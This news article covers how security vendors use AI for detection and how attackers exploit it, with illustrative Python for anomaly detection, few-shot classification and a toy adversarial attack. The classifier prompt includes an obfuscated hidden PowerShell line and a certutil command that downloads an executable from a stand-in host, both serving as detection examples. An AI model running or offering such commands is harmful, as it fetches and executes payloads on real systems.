Cybersecurity companies have long been using artificial intelligence (AI) or machine learning to enhance visibility and detect security threats. The introduction of OpenAI’s ChatGPT, a chatbot capable of creating human-like conversations using natural language processing (NLP), has amplified the discussion on the advantages and disadvantages of AI in cybersecurity and whether its use should be regulated.
Today, the implementation of AI presents both benefits and drawbacks for the cybersecurity sector.
“I usually define AI in two layers — one is its ability to reduce initial threats, and the other is the heuristics/behavior analytics within the software to block and detect attacks in real-time,” said Adrian Hia, managing director for Asia Pacific at Kaspersky, in an email interview.
Leveraging language models in security
Sophos, a cybersecurity-as-a-service (CaaS) company, holds an optimistic view of generative AI in mitigating attacks.
“We have been using artificial intelligence and various forms of machine learning for about six years now,” said Ben Verschaeren, a security specialist and Senior Manager for Global Solutions at Sophos, in an interview with Back End News.
Sophos’ data science team has developed algorithms that detect malware and malicious activity on endpoints and firewalls by identifying abnormal behavior. According to Verschaeren, language models can help lower the barrier to entry into the cybersecurity field. Sophos believes the GPT-3 language model can filter malicious activity out of its XDR telemetry.
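As a rough illustration of that kind of behavioral detection, the sketch below trains an isolation forest on baseline endpoint telemetry and flags an outlier. The features, numbers, and library choice (scikit-learn) are assumptions for illustration, not Sophos’ actual models.

```python
# A minimal behavioral anomaly detection sketch -- illustrative only,
# not Sophos' models. Trains scikit-learn's IsolationForest on
# made-up baseline endpoint telemetry, then scores a new process.
import numpy as np
from sklearn.ensemble import IsolationForest

rng = np.random.default_rng(seed=0)

# Invented per-process features: [child processes spawned,
# outbound connections/min, files written/min].
baseline = rng.normal(loc=[2.0, 1.0, 5.0], scale=[1.0, 0.5, 2.0], size=(500, 3))

detector = IsolationForest(contamination=0.01, random_state=0)
detector.fit(baseline)

burst = np.array([[40.0, 25.0, 300.0]])  # ransomware-like activity spike
print(detector.predict(burst))           # [-1] -> flagged as anomalous
```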
In its report titled “GPT for you and me: Applying AI language processing to cyber defenses,” Sophos details the progress of its three SophosAI projects, which aim to leverage the technology for strengthening cybersecurity solutions. These projects use “few-shot learning” to train the AI model with limited data samples.
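As a rough illustration of few-shot learning in this setting, the hypothetical sketch below prompts a GPT-3-style completion model with a handful of labeled command lines before asking it to classify a new one. The prompt, labels, and model name are assumptions for illustration, not drawn from Sophos’ report.

```python
# Hypothetical few-shot prompt for telemetry triage -- illustrative
# only, not Sophos' actual pipeline. Uses the legacy OpenAI
# completions API (openai<1.0); the model choice is an assumption.
import os
import openai

openai.api_key = os.environ["OPENAI_API_KEY"]

FEW_SHOT_PROMPT = """Classify each command line as MALICIOUS or BENIGN.

Command: powershell -nop -w hidden -enc SQBFAFgAIAAo...
Label: MALICIOUS

Command: ping -c 4 10.0.0.1
Label: BENIGN

Command: {command}
Label:"""

def classify_command(command: str) -> str:
    """Label one telemetry record using a handful of in-prompt examples."""
    response = openai.Completion.create(
        model="text-davinci-003",                       # illustrative model
        prompt=FEW_SHOT_PROMPT.format(command=command),
        max_tokens=3,
        temperature=0,                                  # deterministic labels
    )
    return response["choices"][0]["text"].strip()

print(classify_command("certutil -urlcache -split -f http://bad.example/p.exe"))
```

The appeal of few-shot learning here is that the labeled examples live in the prompt itself, so analysts can add or swap examples without retraining a model.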
Kaspersky, meanwhile, has integrated AI into its Kaspersky for Android solution, which detects around 33% of all new Android threats. The product grew out of the first wave of malware attacks on Android OS users in 2009; by 2012, Kaspersky’s solutions were monitoring 467,515 samples per month.
Hia acknowledged that it is nearly impossible for humans alone to detect such a high volume of malware. So, Kaspersky combines machine learning (AI) with human expertise to combat cyber threats.
“AI is the next step in advancing digital technology, and we believe it is both disrupting and transforming every industry,” Hia said. “From a cybersecurity standpoint, we know that AI will play an essential role in protecting businesses from cyber threats. Just as cybercriminals have sophisticated tools and exploit AI to create new threats, businesses will have AI as an additional defense.”
“Enhancing” security threats
Matt Morris, security managing director of 1898 & Co., a global business and technology consultancy, cautions that threat actors can also take advantage of AI capabilities.
Morris stated in a virtual interview that AI enhances the capabilities of “commonplace attacks” like ransomware or malware infections.
“The ability of threat actors to develop and deploy code or malware has significantly improved due to advancements in AI over the past decade,” Morris said. “AI’s increased processing power and data consumption have made a noticeable difference.”
Morris emphasized that AI can influence attacks in the information technology landscape more easily than in operational technology. He explained that the processing capabilities required for AI are not universally available in operational technology environments.
Kaspersky’s research, conducted by its Global Research and Analysis Team (GReAT), reveals various applications of AI in cybercrime, including bypassing new authentication methods.
“For instance, in biometric authentication used by some financial institutions and banking apps, a user must look to the right, to the left, and then smile,” Hia said. “With AI tools, a cybercriminal can accomplish this with only a photo of the user (victim).”
As part of its ongoing research, Kaspersky explores the possibility of data poisoning and adversarial attacks through the use of AI.
“An adversarial attack involves making small changes to an object so that the machine learning model misclassifies it,” Hia explained.
He further noted that while real-world adversarial attacks are not yet widespread, they can be part of targeted attacks by highly skilled data scientists, requiring significant effort. However, these attacks are highly profitable as they can be used to create new strains of malware.
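A toy example helps make the mechanics concrete. The sketch below perturbs a sample just enough to flip the verdict of a simple logistic-regression “malware classifier” using a fast-gradient-sign-style step; the model, weights, and features are all invented for illustration.

```python
# A toy fast-gradient-sign-style attack on an invented logistic-
# regression "malware classifier"; weights, features, and step size
# are illustrative, not from any real product.
import numpy as np

def sigmoid(z: float) -> float:
    return 1.0 / (1.0 + np.exp(-z))

# Pretend trained model over four numeric file features.
w = np.array([2.0, -1.5, 1.0, 3.0])
b = -1.0

x = np.array([0.6, 0.3, 0.5, 0.4])          # sample the model flags
score = sigmoid(w @ x + b)
print(f"before perturbation: {score:.2f}")  # ~0.81 -> "malicious"

# The gradient of the score w.r.t. the input is s*(1-s)*w, so stepping
# each feature against the gradient's sign lowers the score most per
# unit of change (the core idea of the fast gradient sign method).
grad = score * (1 - score) * w
x_adv = x - 0.25 * np.sign(grad)

adv_score = sigmoid(w @ x_adv + b)
print(f"after perturbation:  {adv_score:.2f}")  # ~0.40 -> "benign"
```

Real attacks target far larger models, but the principle is the same: small, targeted input changes exploit the geometry of the learned decision boundary.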
Generative AI
Whether generative AI does more good than harm comes down to the rules and moral standards that adversaries and security practitioners follow.
According to Morris, adversaries do not adhere to rules and can use AI however they please. On the other hand, defenders have specific rules to follow, especially in critical infrastructure environments.
Defenders aim to ensure the safety of people within these environments and maintain reliable operations. They face added constraints due to regulatory compliance, which establishes standards. Adversaries, in contrast, can utilize AI for perpetrating attacks, leveraging its capabilities and processing power in the most effective ways.
Using AI to counter AI
Hia warns that once machine learning algorithms are introduced into the real world, various types of attacks can manipulate them, leading to deliberate errors and significant damage. For example, misidentified Trojans can infect millions of devices, resulting in substantial losses for individuals and organizations.
Kaspersky advises security vendors to view ML methods as part of a multi-layered security approach that combines technology and human expertise for successful implementation. Hia suggests that ML/AI-specific security audits and red-teaming should be essential components of ML/AI development. It is crucial to have a clear understanding of the reliance on third-party data and architectures since attacks often exploit third-party inputs.
Hia believes that most core business processes will eventually rely on AI, making AI-enabled responses necessary to supplement human intelligence and strengthen cyber defenses.
“A multi-layered approach should be employed,” he said.
Morris poses the question of whether one would use AI to counter the use of AI in cybersecurity.
“For now, it is essential to establish a strong foundation and ensure preparedness upfront,” Morris said.
He emphasizes that organizations have the capacity to identify their most critical assets, and prevention remains a major component of cybersecurity.
“It is important to implement operational safeguards and various measures to support cybersecurity defenses,” he said. “Organizations should focus on upfront preparedness, conduct testing of incident response plans, and be ready to execute them efficiently. Adversaries will continue to leverage AI technology, so it is crucial to engineer out as much risk as possible by implementing monitoring and detection systems and having a solid response mechanism in place.”